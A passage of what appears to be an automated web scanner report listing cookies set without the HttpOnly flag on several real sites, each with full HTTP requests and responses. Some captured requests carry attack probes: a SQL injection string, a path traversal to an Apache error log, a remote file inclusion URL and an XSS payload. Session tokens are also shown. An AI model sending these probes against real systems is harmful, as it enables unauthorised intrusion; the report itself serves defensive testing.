Set-Cookie: JSESSIONID=B5nHN1Gc4ybGGqDmBpJGQWc4zLmmTVYkQCRtT62dbcTHJ21Gh0nyXcRkBNW8L2lLYXTlBCqgWNYv81PF1jh1nnCgkxLb691G2fmtYTf9gXpBvLwyvDgFJKknzh1Q5jQD!-620026609; path=/
Set-Cookie: NLVisitorId=rcHW8495AWICDiX0; domain=checkout.netsuite.com; expires=Sunday, 15-Apr-2012 14:26:36 GMT; path=/
Set-Cookie: NLShopperId=rcHW8495AXICDie_; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:26:36 GMT; path=/
Set-Cookie: NS_VER=2011.1.0; domain=checkout.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=869
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 2244


<html>
<head>
<title>Checkout</title>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crum
...[SNIP]...

16.16. http://customer.kronos.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://customer.kronos.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: customer.kronos.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1303738433760-48782#1303740624|check#true#1303738824; s_cc=true; s_nr=1303738765059; s_invisit=true; s_lv=1303738765060; s_lv_s=First%20Visit; s_gpv_page=kronos%3Acustomer-support-login.aspx; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.3.10.1303738437

Response

HTTP/1.1 302 Object moved
Date: Mon, 25 Apr 2011 13:39:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: https://customer.kronos.com/Default.asp
Content-Length: 160
Content-Type: text/html
Set-Cookie: KronosCust=LogIn=false; path=/
Set-Cookie: ASPSESSIONIDQASQRRDR=DIMMPBCAPHHPGGNHONJOMKDE; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://customer.kronos.com/Default.asp">here</a>.</body>

16.17. https://customer.kronos.com/Default.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://customer.kronos.com
Path:   /Default.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

HEAD /Default.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: customer.kronos.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 17287
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: ICRedirect=Url=; path=/
Set-Cookie: KronosCust=LogIn=false; path=/
Set-Cookie: ASPSESSIONIDQASQRRDR=GKMMPBCAFDPKJBLLDIIBOHPD; path=/
Cache-control: private


16.18. https://employer.unicru.com/asp/home/login.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://employer.unicru.com
Path:   /asp/home/login.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /asp/home/login.asp HTTP/1.1
Referer: https://employer.unicru.com/asp/home/login.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: employer.unicru.com
Expect: 100-continue
Accept-Encoding: gzip, deflate
Content-Length: 214

txtUsername=Smith&txtPassword=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&image1.
...[SNIP]...

Response

HTTP/1.1 302 Object moved
Date: Mon, 25 Apr 2011 13:52:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 44
Location: ../../asp/home/ErrorPage.asp?ErrCode=0
Content-Length: 159
Content-Type: text/html
Set-Cookie: Emp=datpwx=&UN=&SkipSSL=&PT=&step=&LHIS=&Browser=&ActiveLocation=&Expiration=4%2F24%2F2010&ActiveState=&UType=&MultipleLocation=&RowsPerPage=&CID=&EUID=; path=/
Set-Cookie: ASPSESSIONIDQCDRBTRC=NNLPKKJCDHNIPJJGHAECJHGA; path=/
Cache-control: private
Set-Cookie: KTMDWestLB=385942538.20736.0000; path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="../../asp/home/ErrorPage.asp?ErrCode=0">here</a>.</body>

16.19. https://employer.unicru.com/asp/home/login.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://employer.unicru.com
Path:   /asp/home/login.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /asp/home/login.asp HTTP/1.1
Referer: https://employer.unicru.com/asp/home/login.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: employer.unicru.com
Expect: 100-continue
Accept-Encoding: gzip, deflate
Content-Length: 106

txtUsername=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fvar%2flog%2fapache%2ferror.log&txtPassword=3

Response

HTTP/1.1 302 Object moved
Date: Mon, 25 Apr 2011 13:50:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 44
Location: ../../asp/home/ErrorPage.asp?ErrCode=0
Content-Length: 159
Content-Type: text/html
Set-Cookie: Emp=datpwx=&UN=&SkipSSL=&PT=&step=&LHIS=&Browser=&ActiveLocation=&Expiration=4%2F24%2F2010&ActiveState=&UType=&MultipleLocation=&RowsPerPage=&CID=&EUID=; path=/
Set-Cookie: ASPSESSIONIDSSRADQTB=EINNMKJCGHFFJHCJOHNLPDMM; path=/
Cache-control: private
Set-Cookie: KTMDWestLB=1211368202.20736.0000; path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="../../asp/home/ErrorPage.asp?ErrCode=0">here</a>.</body>

16.20. https://employer.unicru.com/asp/home/login.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://employer.unicru.com
Path:   /asp/home/login.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /asp/home/login.asp HTTP/1.1
Host: employer.unicru.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 42vm
Content-Length: 3592
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSRCBTSB=MCAKPIJCNPCBKCIMDMJHBHMD; path=/
Cache-control: private
Set-Cookie: KTMDWestLB=993264394.20736.0000; path=/


<html>
   <head>
       <title>Unicru: Employer's Desktop Log In</title>
       <style type="text/css">
       <!--
       .content {FONT-WEIGHT: normal; FONT-SIZE: 11px; COLOR: #666666; FONT-FAMILY: verdana, san-
...[SNIP]...

16.21. https://employer.unicru.com/asp/home/login.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://employer.unicru.com
Path:   /asp/home/login.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /asp/home/login.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: employer.unicru.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:40:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 43
Content-Length: 3592
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSAATCQTA=MGBECJJCAMBAEKDDNHDKHNIH; path=/
Cache-control: private
Set-Cookie: KTMDWestLB=184615946.20736.0000; path=/


<html>
   <head>
       <title>Unicru: Employer's Desktop Log In</title>
       <style type="text/css">
       <!--
       .content {FONT-WEIGHT: normal; FONT-SIZE: 11px; COLOR: #666666; FONT-FAMILY: verdana, san-
...[SNIP]...

16.22. http://event.adxpose.com/event.flow  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event.flow?eventcode=000_000_2&location=http%3A%2F%2Fwww.livejournal.com%2F&uid=ZC45X9Axu6NOUFfX_289669&xy=0%2C0&wh=300%2C250&vchannel=69112&cid=166308&iad=1303741261966-50137159274891016&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888; JSESSIONID=C0008DDFCA8D08F38F996B46ADF6D0E1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4AA45FF46CF90CD8523E63E97BF73AD9; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 0
Date: Mon, 25 Apr 2011 14:20:50 GMT
Connection: close


16.23. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hmc/report/ HTTP/1.1
Host: hourly.deploy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:30 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=d8308cb242bf2b615f7a;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:39:30 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:39:30 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:39:30 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4789


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...

16.24. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /hmc/report/index.cfm?register=http://netsparker.com/n HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: hourly.deploy.com
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 102

email=netsparker%40example.com&j_password=3&j_passwordconfirm=3&j_username=Smith&name=Smith&storenum=3

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:46 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=3e307db0b53d142e16b3;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...

16.25. http://partner-support.wiki.zoho.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://partner-support.wiki.zoho.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: partner-support.wiki.zoho.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/me_partners.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: zwcsrfcki=a464e14f-4662-4feb-a6bd-971a8b0a1575; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=786F43CF2EEC7C59F1192542DC2667C0; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 12:15:18 GMT
Server: Apache-Coyote/1.1
Content-Length: 4700


<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

   
<title>Sign in</title>
<style>

BODY {
   background-color: #FFFFFF;
   margin:
...[SNIP]...

16.26. http://partners.criticalwatch.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://partners.criticalwatch.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: partners.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/support/critical-watch-support.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:02:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22e3e36a1656899ba1b39a906867342f35%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+Ap%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221303736523%22%3B%7Dbb0b132cbb659931fd437f541f9e27c3; expires=Mon, 25-Apr-2011 17:02:03 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta content="text/html; ch
...[SNIP]...

16.27. http://shopping.netsuite.com/app/site/hit/tracker.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://shopping.netsuite.com
Path:   /app/site/hit/tracker.nl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/site/hit/tracker.nl?c=438708&n=1&type=store&sc=3&category=-103&it=&itemid=&referer=http%3A//burp/show/19 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://shopping.netsuite.com/s.nl?c=438708&n=1&sc=3&ext=T&promocode=&qtyadd=1&mboxSession=1303736347554-914602&Submit.x=43&productId=1650&Submit.y=8&whence=&6483e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527be136aaa48c=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=dYyfN1wHZN71TmqdTHVPc5rfpmdrpWWkqQGJBTWHYGvFy6PP4kwCF9spppQp2p6T1y9LcTBvdSVRJT4zdGg0FbSwpQwRl5vyB94JHShTwbxX21bQLM8ycnhGDnyFQxbh!-2139436563; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.1.10.1303741547; mbox=check#true#1303741608|session#1303736347554-914602#1303743408|PC#1303736347554-914602.17#1304951149

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:25:37 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Content-Length: 0
Expires: 0
NS_RTIMER_COMPOSITE: -2027806046:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; path=/
Set-Cookie: NLShopperId=rcHW8415AciYvvMS; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 14:25:38 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8


16.28. http://shopping.netsuite.com/app/site/query/additemtocart.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://shopping.netsuite.com
Path:   /app/site/query/additemtocart.nl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303736347554-914602&productId=1650 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 62

buyid=1650&Submit.x=43&Submit.y=8&c=438708&qtyadd=1&promocode=

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 25 Apr 2011 12:59:54 GMT
Server: Apache
Location: /s.nl?c=438708&n=1&sc=3&ext=T&promocode=&qtyadd=1&mboxSession=1303736347554-914602&Submit.x=43&productId=1650&Submit.y=8&whence=
Expires: 0
NS_RTIMER_COMPOSITE: 1120473518:73686F702D6A6176613030332E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=mvcnN1wK94GbYGym1LHB3yTs2BZr95jnRnSsg8T7DSWtbMRrnz2jSQhVXgBz1h5FmvJJRnm7G9v0khqbf08h4CZVwXzh2xQ10sHch9Mv5nsHgKz9z2JDTpTGpvdc67Ch!719211912; path=/
Set-Cookie: NLVisitorId=rcHW8415ATCkvpg2; domain=shopping.netsuite.com; expires=Sunday, 15-Apr-2012 12:59:56 GMT; path=/
Set-Cookie: NLShopperId=rcHW8415ATukvi6P; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: NLShopperId=rcHW8415ATukvi6P; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: NS_VER=2011.1.0; domain=shopping.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Length: 0
Content-Type: text/html; charset=utf-8


16.29. http://shopping.netsuite.com/core/styles/pagestyles.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://shopping.netsuite.com
Path:   /core/styles/pagestyles.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/styles/pagestyles.nl?ct=103&bglt=F2F4F6&bgmd=FFFFFF&bgdk=737A82&bgon=6f7a8e&bgoff=878fa2&bgbar=878fa2&tasktitletext=ffffff&crumbtext=ffffff&headertext=ffffff&ontab=ffffff&offtab=ffffff&text=000000&link=000000&bgbody=FFFFFF&bghead=FFFFFF&portlet=FFFFFF&portletlabel=000000&bgbutton=F2F4F6&bgrequiredfld=ffffff&font=Arial%2CHelvetica%2Csans-serif&size_site_content=10pt&size_site_title=10pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3 HTTP/1.1
Accept: */*
Referer: http://shopping.netsuite.com/s.nl?c=438708&n=1
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: shopping.netsuite.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=NQZkN1GDlyzQCQVYjTjhvD8NGnBvydlJ1XVDfphhhgnnYL1p4BDYQyCRjWnBmn1zPvnlT3tX4RF6Gby13Wtm3KjKDptP6whcYVPYpNyyTMbcjFMnMg5vrGB6pBlvPLWD!-2139436563; NLVisitorId=rcHW8495AS0gDkNQ; NLShopperId=rcHW8495AT0gDvdP; NS_VER=2011.1.0

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:11:04 GMT
Server: Apache
Expires: Tue, 26 Apr 2011 06:15:04 GMT
Last-Modified: Mon, 25 Apr 2011 15:11:04 GMT
NS_RTIMER_COMPOSITE: 2009151588:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=k5YGN1PLTZzmR0nzLGhnzQDvz2fmnVmwP08wLTCLgBcwkdN2QGGlyJx1nF2fmWcBRhvGwTDryHVlyqhcZ9X4CPL6BCjGyp8jLpRXjhGgycX124RYS3rJvDj8xCfCGnvC!-2139436563; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/css; charset=UTF-8
Content-Length: 69366

.iArrowLeft, .iArrowRight { display:inline-block; height:15px; width:16px; margin: 0 2px; background: url(/images/chiles/dashboard_icons.png) no-repeat; text-decoration: none; zoom:1}
.iArrowLeft { ma
...[SNIP]...

16.30. http://shopping.netsuite.com/s.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://shopping.netsuite.com
Path:   /s.nl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /s.nl?c=438708&n=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: shopping.netsuite.com
Pragma: no-cache

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:44 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1584514099:73686F702D6A6176613031362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=GQy1N1GGvj7DswgGhDMN2ZhvJv4H3X6nxLLhgvh11z7mmH1pQQ4GSVvXYgJ34W5fnv0yBWQG4pfxkG9ZnT7C6lLPHblCH3vLW4lLc2H2czvnsTyvTSZpJyCty72LlGB1!-363664704; path=/
Set-Cookie: NLVisitorId=rcHW8495AXwkDiG7; domain=shopping.netsuite.com; expires=Sunday, 15-Apr-2012 14:26:45 GMT; path=/
Set-Cookie: NLShopperId=rcHW8495AYwkDsle; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 14:26:45 GMT; path=/
Set-Cookie: NS_VER=2011.1.0; domain=shopping.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 101978


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Product Catalog</title>


<script type="text/javascript">
var gaJsHost = (("https:" == document.location
...[SNIP]...

16.31. http://t5.trackalyzer.com/trackalyze.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t5.trackalyzer.com
Path:   /trackalyze.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackalyze.asp?r=https%3A//store.manageengine.com/service-desk/index.html&p=https%3A//www.manageengine.com/network-performance-management.html&i=18004 HTTP/1.1
Host: t5.trackalyzer.com
